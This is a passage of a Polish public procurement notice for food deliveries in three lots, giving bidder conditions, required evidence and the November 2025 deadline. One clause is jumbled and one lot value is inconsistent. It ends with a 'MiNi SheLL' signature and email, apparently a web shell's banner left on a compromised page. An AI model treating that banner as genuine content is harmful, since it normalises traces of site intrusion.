udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy<br/>spełniają warunki udziału w postępowaniu, w zakresie:<br/>1) zdolności do występowania w obrocie gospodarczym<br/>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w<br/>sposób szczególny.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej<br/>lub zawodowej, o ile wynika to z odrębnych przepisów<br/>Wykonawca spełni warunek jeżeli wykaże, że:<br/>a) został dopuszczony do produkcji lub obrotu artykułami spożywczymi zgodnie z ustawą z dnia 25 sierpnia 2006 r o<br/>bezpieczeństwie żywności i żywienia (Dz. U. z 2023 r., poz 1448);<br/>b) zgłosił działalność gospodarczą w zakresie produkcji, składowania, konfekcjonowania i obrotu artykułami rolno-<br/>spożywczymi do wojewódzkiego inspektora jakości handlowej artykułów rolno-spożywczych zgodnie z ustawą<br/>z dnia 21 grudnia 2000 r. o jakości handlowej artykułów rolno-spożywczych (t.j. Dz. U. z 2023 r., poz. 1980).<br/>3) sytuacji ekonomicznej lub finansowej<br/>Wykonawca spełni warunek jeżeli wykaże, że posiada:<br/>a) środki finansowe i zdolność kredytową - zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie<br/>Wykonawca zobowiązany jest wykazać w sposób szczególny;<br/>b) ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia<br/>na sumę gwarancyjną nie mniejszą niż:<br/>dla I części: 60.000,00 zł<br/>dla II części: 35.000,00 zł<br/>dla III części: 35.000,00 zł<br/>Jeżeli dotyczy: w przypadku składania oferty na więcej niż jedną część zamówienia wartość wymaganych w pkt. a) środków<br/>finansowych i zdolności kredytowej oraz b) polisy ubezpieczeniowej winna być nie mniejsza niż suma wartości dla tych<br/>części.<br/>4) zdolności technicznej lub zawodowej Wykonawca spełni warunek jeżeli wykaże, że w okresie ostatnich 3 lat, a jeżeli<br/>okres prowadzenia działalności jest krótszy – w tym okresie, zrealizował należycie co najmniej 2 dostawy odpowiadające<br/>swoim zakresem przedmiotowi zamówienia o wartości nie mniejszej niż:<br/>dla I części 60 000,00 zł każde zamówienie oraz na potwierdzenie tego przedstawi referencje z wykonanych dostaw,<br/>dla II części 35 000,00 zł każde zamówienie oraz na potwierdzenie tego przedstawi referencje z wykonanych dostaw<br/>dla III części: 35 000,00 zł każde zamówienie oraz na potwierdzenie tego przedstawi referencje z wykonanych dostaw <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku podstaw wykluczenia Wykonawcy z udziału w postępowaniu o udzielenie zamówienia, Wykonawca na wezwanie<br/>Zamawiającego dostarczy:<br/>1) odpis lub informację z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej,<br/>sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>2) oświadczenie własne Wykonawcy w zakresie określonym w art. 108 ust. 1 pkt 1 i 2 ustawy;<br/>3) oświadczenie własne Wykonawcy w zakresie określonym w art. 108 ust. 1 pkt 3 ustawy odnośnie braku wydania wobec niego<br/>prawomocnego wyroku sądu lub ostatecznej decyzji administracyjnej o zaleganiu z uiszczaniem podatków, opłat lub składek na<br/>ubezpieczenia społeczne lub zdrowotne albo - w przypadku wydania takiego wyroku lub decyzji - dokumentów potwierdzających<br/>dokonanie płatności tych należności wraz z ewentualnymi odsetkami lub grzywnami lub zawarcie wiążącego porozumienia w<br/>sprawie spłat tych należności;<br/>4) oświadczenie własne Wykonawcy w zakresie określonym w art. 108 ust. 1 pkt 4 ustawy, odnośnie orzeczenia zakazu ubiegania<br/>się o zamówienie publiczne tytułem środka karnego;<br/>5) oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy (dot. braku przynależności do tej samej grupy kapitałowej, w<br/>rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2024 r. poz. 594) z innym wykonawcą,<br/>który złożył odrębną ofertę w postępowaniu albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami<br/>lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego wykonawcy należącego do tej samej grupy<br/>kapitałowej) – zgodnie ze wzorem oświadczenia stanowiącym załącznik nr 5 do SWZ;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu<br/>wstępnego potwierdzenia spełnienia warunków, Zamawiający wymaga złożenia wraz z ofertą, aktualnego na dzień składania<br/>Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy<br/>ofert oświadczenia stanowiącego Załącznik nr 3 do SWZ. Oświadczenie należy złożyć w postaci elektronicznej i opatrzyć kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym osoby/osób upoważnionej/upoważnionych do reprezentacji.<br/>W celu potwierdzenia spełnienia warunków udziału wykonawcy w postępowaniu o udzielenie zamówienia, wykonawca, na wezwanie<br/>Zamawiającego dostarczy:<br/>1) zdolności do występowania w obrocie gospodarczym<br/>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób<br/>szczególny.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej<br/>lub zawodowej, o ile wynika to z odrębnych przepisów<br/>Wykonawca spełni warunek jeżeli wykaże, że:<br/>a) został dopuszczony do produkcji lub obrotu artykułami spożywczymi zgodnie z ustawą z dnia 25 sierpnia 2006 r o bezpieczeństwie żywności i żywienia (Dz. U. z 2023 r., poz 1448)<br/>b) zgłosił działalność w zakresie produkcji, składowania, konfekcjonowania i obrotu artykułami rolno-spożywczymi do wojewódzkiego<br/>inspektora jakości handlowej artykułów rolno-spożywczych, zgodnie z ustawa z dnia 21 grudnia 2000 r, o jakości handlowej<br/>artykułów rolno-spożywczych (Dz. U. z 2023 r., poz. 1980).<br/>3) sytuacji ekonomicznej lub finansowej<br/>Wykonawca spełni warunek jeżeli wykaże, że posiada:<br/>a) środki finansowe i zdolność kredytową<br/>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób<br/>szczególny<br/>b) ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na<br/>sumę gwarancyjną nie mniejszą niż:<br/>dla I części: 60.000,00 zł<br/>dla II części: 35.000,00 zł<br/>dla III części: 35.000,00 zł<br/>Jeżeli dotyczy: w przypadku składania oferty na więcej niż jedną część zamówienia wartość wymaganych w pkt. a) środków<br/>finansowych i zdolności kredytowej oraz b) polisy ubezpieczeniowej winna być nie mniejsza niż suma wartości dla tych części.<br/>4) zdolności technicznej lub zawodowej<br/>Wykonawca spełni warunek jeżeli wykaże, że w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym<br/>okresie, zrealizował należycie co najmniej 2 dostawy odpowiadające swoim zakresem przedmiotowi zamówienia o wartości nie<br/>mniejszej niż:<br/>dla I części: 60.000 zł brutto,<br/>dla II części: 35 000,00 zł brutto<br/>dla III części: 5 000,00 zł brutto<br/>każde zamówienie oraz na potwierdzenie tego przedstawi referencje z wykonanych dostaw</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1.	Zamawiający wymaga złożenia wraz z ofertą następujących przedmiotowych środków dowodowych:<br/>a)	aktualna karta produktu środków spożywczych dla I, II, III części (zgodnie z Opisem przedmiotu zamówienia dla I, II, III części – załącznik nr 2.1, 2.2, 2.3 do SWZ) <br/>2.	Jeżeli Wykonawca nie złoży przedmiotowych środków dowodowych lub złożone przedmiotowe środki dowodowe będą niekompletne, Zamawiający wezwie do ich złożenia lub uzupełnienia w wyznaczonym terminie.<br/>3.	Postanowień ust. 2 nie stosuje się, jeżeli przedmiotowy środek dowodowy służy potwierdzaniu zgodności z cechami lub kryteriami określonymi w opisie kryteriów oceny ofert lub, pomimo złożenia przedmiotowego środka dowodowego, oferta podlega odrzuceniu albo zachodzą przesłanki unieważnienia postępowania. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Zamawiający wymaga złożenia wraz z ofertą następujących przedmiotowych środków dowodowych:<br/>a)	aktualna karta produktu środków spożywczych dla I, II, III części (zgodnie z Opisem przedmiotu zamówienia dla I, II, III części – załącznik nr 2.1, 2.2, 2.3 do SWZ) <br/>2.	Jeżeli Wykonawca nie złoży przedmiotowych środków dowodowych lub złożone przedmiotowe środki dowodowe będą niekompletne, Zamawiający wezwie do ich złożenia lub uzupełnienia w wyznaczonym terminie.<br/>3.	Postanowień ust. 2 nie stosuje się, jeżeli przedmiotowy środek dowodowy służy potwierdzaniu zgodności z cechami lub kryteriami określonymi w opisie kryteriów oceny ofert lub, pomimo złożenia przedmiotowego środka dowodowego, oferta podlega odrzuceniu albo zachodzą przesłanki unieważnienia postępowania. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Zgodnie z Rozdziałem 16.:Wspólne ubieganie się o udzielenie zamówienia<br/>1. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>1) warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o którym mowa w<br/>art. 112 ust. 2 pkt 2 ustawy, jest spełniony, jeżeli co najmniej jeden z Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje usługi, do<br/>których realizacji te uprawnienia są wymagane;<br/>2) w odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia Wykonawcy<br/>wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają<br/>usługi, do realizacji których te zdolności są wymagane;<br/>3) w przypadku, o którym mowa w pkt 1 i 2, Wykonawcy wspólnie ubiegający się<br/>o udzielenie zamówienia dołączają odpowiednio do oferty oświadczenie, z którego wynika, które usługi wykonają<br/>poszczególni Wykonawcy.<br/>Wykonawcy składają oświadczenia (o ile dotyczy) w oryginale w postaci dokumentu elektronicznego opatrzonego<br/>kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym przez osoby upoważnione do<br/>reprezentowania Wykonawców zgodnie z formą reprezentacji określoną w dokumencie rejestrowym właściwym dla formy<br/>organizacyjnej lub w innym dokumencie.<br/>Uwaga: Warunek dot. braku podstaw wykluczenia z postępowania musi spełniać każdy z Wykonawców samodzielnie.<br/>2. W celu potwierdzenia spełnienia warunków udziału w postępowaniu Wykonawca może polegać na potencjale podmiotu<br/>trzeciego na zasadach opisanych w art. 118–123 ustawy. Podmiot trzeci, na potencjał którego Wykonawca powołuje się w<br/>celu wykazania spełnienia warunków udziału w postępowaniu, nie może podlegać wykluczeniu na podstawie art. 108 ust.1.,<br/>art. 109 ust.1 ustawy oraz art. art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie<br/>przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z rozdz. 7 SWZ oraz z Zał. 4 do SWZ &#34;Projektowane postanowienia umowy&#34; <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-11-07 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/transakcja/1201530</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-11-07 09:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com